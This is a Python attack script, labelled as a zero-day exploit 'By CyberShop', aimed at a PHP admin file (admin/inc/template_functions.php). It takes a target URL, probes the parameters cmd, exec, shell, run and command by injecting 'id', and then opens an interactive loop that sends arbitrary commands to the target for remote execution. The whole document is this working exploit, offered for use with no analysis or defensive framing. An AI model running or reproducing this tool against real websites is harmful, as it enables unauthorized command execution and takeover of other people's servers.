Zero-Day Vulnerability Report

import requests
import re
from urllib.parse import urljoin
from rich.console import Console
from rich.panel import Panel
from rich.prompt import Prompt
from rich.text import Text
console = Console()
def banner():
    art = “””
███████╗██╗     ██╗   ██╗██╗███████╗███████╗███████╗ ██████╗
██╔════╝██║     ██║   ██║██║██╔════╝██╔════╝██╔════╝██╔═══██╗
█████╗  ██║     ██║   ██║██║███████╗█████╗  █████╗  ██║   ██║
██╔══╝  ██║     ██║   ██║██║╚════██║██╔══╝  ██╔══╝  ██║   ██║
██║     ███████╗╚██████╔╝██║███████║███████╗███████╗╚██████╔╝
╚═╝     ╚══════╝ ╚═════╝ ╚═╝╚══════╝╚══════╝╚══════╝ ╚═════╝
“””
    console.print(Panel(Text(art, justify=”center”, style=”bold cyan”)))
    console.print(“[bold green]Exploit Zero Day By CyberShop[/bold green]\n”)

def clean_output(text):
    return re.sub(r'<.*?>’, ”, text)

def is_url_alive(url):
    try:
        res = requests.get(url, timeout=5)
        return res.status_code == 200
    except:
        return False
def detect_param(target_url):
    common_params = [‘cmd’, ‘exec’, ‘shell’, ‘run’, ‘command’]
    markers = [‘uid=’, ‘root’, ‘www-data’, ‘daemon’]
    for param in common_params:
        try:
            res = requests.get(target_url, params={param: ‘id’}, timeout=6)
            text = clean_output(res.text)
            if any(m in text.lower() for m in markers):
                return param
        except:
            continue
    return None
def interactive_shell(target_url, param):
    console.print(f”[bold yellow]Shell ready via: {param}[/bold yellow]”)
    while True:
        cmd = Prompt.ask(“[green]$[/green]”)
        if cmd.lower() in [“exit”, “quit”]:
            break
        try:
            res = requests.get(target_url, params={param: cmd}, timeout=10)
            out = clean_output(res.text)
            console.print(f”[blue]Output:[/blue]\n{out.strip() if out else ‘⚠️ No output’}”)
        except Exception as e:
            console.print(f”[red]Error:[/red] {e}”)
def main():
    banner()
    base = Prompt.ask(“🌐 Enter target base URL: “)
    if not base.endswith(‘/’):
        base += ‘/’
    vuln_path = “admin/inc/template_functions.php”
    full_url = urljoin(base, vuln_path)

    console.print(f”[cyan]Testing:[/cyan] {full_url}”)

    if not is_url_alive(full_url):
        console.print(“[red]❌ The target is not vulnerable..[/red]”)
        return
    console.print(“[yellow]✔ Page exists. Testing parameters…[/yellow]”)
    param = detect_param(full_url)
    if param:
        console.print(f”[green]✔ Vulnerable parameter detected:[/green] {param}”)
        interactive_shell(full_url, param)
    else:
        console.print(“[red]❌ No injectable parameter detected. Target not exploitable.[/red]”)
if __name__ == “__main__”:
    main()